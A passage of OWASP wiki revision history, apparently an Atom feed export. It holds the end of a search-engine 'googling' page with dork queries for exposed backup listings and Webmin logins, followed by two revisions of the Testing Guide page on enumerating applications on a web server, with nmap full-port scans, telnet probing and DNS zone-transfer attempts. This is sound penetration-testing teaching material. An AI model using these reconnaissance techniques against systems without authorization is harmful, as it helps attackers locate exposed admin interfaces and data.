Google advanced operators help refine searches. Advanced operators use the following syntax: operator:search_term . Notice that there is no space between the operator, the colon, and the search term. A list of operators and search terms follows:&lt;br /&gt;
* The ''site'' operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.&lt;br /&gt;
* The ''filetype'' operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.&lt;br /&gt;
* The ''link'' operator instructs Google to search within hyperlinks for a search term.&lt;br /&gt;
* The ''cache'' operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.&lt;br /&gt;
* The ''intitle'' operator instructs Google to search for a term within the title of a document.&lt;br /&gt;
* The ''inurl'' operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.&lt;br /&gt;
&lt;br /&gt;
TheA set of googling examples (for a complete list look at [1]):&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:www.xxxxx.ca AND intitle:&amp;quot;index.of&amp;quot; &amp;quot;backup&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The operator :site restricts a search in a specific domain, while the :intitle operator makes it possibile to find the pages that contain &amp;quot;index of backup&amp;quot; as a link title of the Google output.&amp;lt;br&amp;gt;&lt;br /&gt;
The AND boolean operator is used to combine more conditions in a same query.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Index of /backup/&lt;br /&gt;
&lt;br /&gt;
 Name                    Last modified       Size  Description&lt;br /&gt;
&lt;br /&gt;
 Parent Directory        21-Jul-2004 17:48      -  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;Login to Webmin&amp;quot; inurl:10000&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The query produces an output with every Webmin authentication interface collected by Google during the spidering process.&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:www.xxxx.org AND filetype:wsdl wsdl&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The filetype operator is used to find specific kind of files on the web-site.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [1] Johnny Long: &amp;quot;Google Hacking&amp;quot; - http://johnny.ihackstuff.com&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Google – http://www.google.com&amp;lt;br&amp;gt;&lt;br /&gt;
* wget - http://www.gnu.org/software/wget/&lt;br /&gt;
* Foundstone SiteDigger - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/sitedigger.htm&lt;br /&gt;
* NTOInsight - http://www.ntobjectives.com/freeware/index.php&amp;lt;br&amp;gt;&lt;br /&gt;
* Burp Spider - http://portswigger.net/spider/&amp;lt;br&amp;gt;&lt;br /&gt;
* Wikto - http://www.sensepost.com/research/wikto/&amp;lt;BR&amp;gt;&lt;br /&gt;
* Googlegath - http://www.nothink.org/perl/googlegath/&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14830</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14830"/>
				<updated>2007-01-02T20:43:45Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents#Web_Application_Penetration_Testing Up]]&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step for testing for web application vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without direct reference from the main website/application: this is true for internal and/or extranet websites which could be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use a common path for administrative interfaces which can be used to guess or brute force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but, in any case, it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client may not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &lt;br /&gt;
&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. In the following examples, we will examine a few techniques that can be employed to achieve this goal. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&lt;br /&gt;
'''1. Different base URL''' &lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as:&lt;br /&gt;
http://www.example.com/url1 &lt;br /&gt;
http://www.example.com/url2 &lt;br /&gt;
http://www.example.com/url3 &lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised.&lt;br /&gt;
&lt;br /&gt;
'''2. Non-standard ports'''&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&lt;br /&gt;
'''3. Virtual hosts'''&lt;br /&gt;
DNS allows us to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
There is no way to absolutely ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect.&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively, we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&lt;br /&gt;
''DNS zone transfers''&lt;br /&gt;
This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try.&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
A zone transfer may now be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNS inverse queries''&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&lt;br /&gt;
''Web-based DNS searches''&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow it to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertinent to the target you are examining.&lt;br /&gt;
&lt;br /&gt;
''Reverse-IP services''&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &lt;br /&gt;
(requires free membership) &lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/  &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &lt;br /&gt;
(multiple services available) &lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &lt;br /&gt;
(some services are still private at the time of writing) &lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &lt;br /&gt;
(reverse ip/domain lookup) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Googling''&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &lt;br /&gt;
* Search engines (Google, and other major engines). &lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
* nmap - http://www.insecure.org &lt;br /&gt;
* Nessus Vulnerability Scanner - http://www.nessus.org &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14829</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14829"/>
				<updated>2007-01-02T20:09:17Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents#Web_Application_Penetration_Testing Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step for testing for web application vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without direct reference from the main website/application: this is true for internal and/or extranet websites which could be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use a common path for administrative interfaces which can be used to guess or brute force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but, in any case, it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client may not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. In the following examples, we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
